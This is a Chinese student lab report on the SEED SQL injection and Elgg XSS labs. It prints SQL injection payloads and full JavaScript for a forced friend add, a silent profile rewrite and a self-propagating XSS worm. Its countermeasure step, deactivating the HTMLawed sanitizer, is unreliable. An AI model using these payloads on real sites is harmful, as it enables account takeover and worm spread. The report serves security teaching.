20232819 2023-2024-2 《网络攻防实践》实践10报告

一、实践内容

一、SEED SQL注入攻击与防御实验

1、熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。

2、对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

3、对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

4、SQL对抗:修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

1、发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

2、弹窗显示cookie信息:将cookie信息显示。

3、窃取受害者的cookies:将cookie发送给攻击者。

4、成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

5、修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

6、编写XSS蠕虫。

7、对抗XSS攻击。

二、实验过程

实践一SEED SQL注入攻击与防御实验
更改名字
在这里插入图片描述

打开数据库并使用root进行登录
启动mysql,输入命令mysql -u root -p,输入密码seedubuntu
在这里插入图片描述
输入查看所有数据库指令:show databases;
在这里插入图片描述

输入使用数据库指令:use Users;
在这里插入图片描述

查看数据库中的表,可以看到数据库中有credential表:show tables;
在这里插入图片描述

输入查看此表的内容,可以看到员工各项信息select * from credential;
在这里插入图片描述

输入查看Alice的相关信息select * from credential where Name=‘Alice’;
在这里插入图片描述
在自带的火狐浏览器中打开http://www.seedlabsqlinjection.com/网址,这里出现了一个登录界面
在这里插入图片描述

对SELECT语句的SQL注入攻击过程
ctrl+U查看网页源代码,可以看到行校验的是unsafe_home.php:
在这里插入图片描述
输入vim /var/www/SQLInjection/unsafe_home.php 打开unsafe_home.php文件,当用户名是admin时,用户信息表名为credential:
在这里插入图片描述
密码是被哈希过的hashed_pwd,所以不知道密码的情况下,我们无法通过查询到的hashed_pwd进行登录
在这里插入图片描述
使用sql注入的漏洞,输入用户名Admin’#,密码
在这里插入图片描述
登陆成功!对selecrt语句的SQL注入攻击成功。
在这里插入图片描述
对UPDATE语句的SQL注入攻击
通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。点击Edit Profile,发现只能修改以下内容:
在这里插入图片描述
使用vim /var/www/SQLInjection/unsafe_edit_backend.php命令查看unsafe_edit_backend.php文件的源代码,检查Update SQL语句的内容,可以看到内容如下:
在这里插入图片描述
进行SQL注入攻击,构造 ', Salary=‘20232819’ where name=‘Admin’; #,对Admin的Salary进行修改。
在这里插入图片描述
再次登录看到Admin的Salary已经改为20232819
在这里插入图片描述
实践二、SEED XSS跨站脚本攻击实验(Elgg)
1、显示警报窗口
浏览器中进入www.xsslabelgg.com网页,输入用户名Alice,密码seedalice,进行登录:
在这里插入图片描述
点击头像下面的Edit prolife,进入界面,在Brief description中输入,然后保存:
在这里插入图片描述
在这里插入图片描述
查看当前SeedUbuntu的IP
在这里插入图片描述
为192.168.200.2,因此,我们构造以下代码:

在这里插入图片描述
输入以下命令监听端口500,然后用Alice访问Boby后,从而获取到了cookies
在这里插入图片描述
按下ctrl+shift+E,打开开发者工具,然后切换到Network选项卡。点击add friend添加boby为朋友得到URL:
在这里插入图片描述
进入Alice的edit profile,找到about me,把代码放到Alice的 About me 下并选择 Edit HTML 模式,输入以下代码,点击保存

<script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;

    var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    Ajax.send();
}
</script>

在这里插入图片描述
登录Alice的主页,发现已经和Boby成为好友
在这里插入图片描述
构造XSS攻击代码,如下,复制到about me中,然后保存:

<script type="text/javascript">
	window.onload = function(){
	
		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		var content= token + ts + "name=" + userName + "&description=<p>20232819ZHX</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)
		
		var samyGuid=44;
		
		if(elgg.session.user.guid!=samyGuid)
		{

			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	}
</script>

在这里插入图片描述

登录boby的账号
在这里插入图片描述
访问alice后成为朋友
在这里插入图片描述
编写XSS蠕虫
构造蠕虫代码,如下:

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		var content= token + ts + "&name=" + userName + "&description=<p>20232819ZHX"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)
		var samyGuid=44;
		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}		
	}
</script>


登录用户名Admin,密码seedelgg,进入Admin主页,打开Account-Administration-plugins,找到 HTMLawed ,关闭,即设为 Deactivate 状态:
在这里插入图片描述
登录Boby的账号,发现XSS蠕虫攻击失效:
在这里插入图片描述

三、遇到的问题

问题一:不能复制代码
解决一:,采用VM Tools 或者手打输入

四、实验收获

学习了SQL注入、Web渗透、XSS攻击有了初步的了解

  • 33
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值